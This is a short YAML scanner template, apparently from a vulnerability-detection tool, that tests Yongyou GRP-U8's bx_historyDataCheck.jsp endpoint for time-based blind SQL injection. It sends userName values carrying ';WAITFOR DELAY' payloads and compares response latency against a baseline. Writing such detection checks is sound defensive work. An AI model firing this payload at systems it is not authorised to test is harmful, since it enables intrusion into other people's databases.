name: yongyou-grp-u8-bx_historyDataChecks-sqli
rules:
  - method: POST    
    path: "/u8qx/bx_historyDataCheck.jsp"
    body: 
      userName=';WAITFOR DELAY '0:0:0'--&ysnd=&historyFlag=
    expression: |
      response.status == 200
    output: # 捕获网站原始响应延时
      t0: response.latency
  - method: POST    
    path: "/u8qx/bx_historyDataCheck.jsp"
    body: userName=';WAITFOR DELAY '0:0:5'--&ysnd=&historyFlag=
    expression: | # 时间盲注5秒后网站的响应延时 - 网站原始响应延时 > 4500ms
      response.status == 200 && response.latency - t0 >= 5 * 1000 - 500
  - method: POST    
    path: "/u8qx/bx_historyDataCheck.jsp"
    body: 
      userName=';WAITFOR DELAY '0:0:3'--&ysnd=&historyFlag=
    expression: | # 时间盲注3秒后网站的响应延时 - 网站原始响应延时 > 2500ms
      response.status == 200 && response.latency - t0 >= 3 * 1000 - 500
detail:
  author: zan8in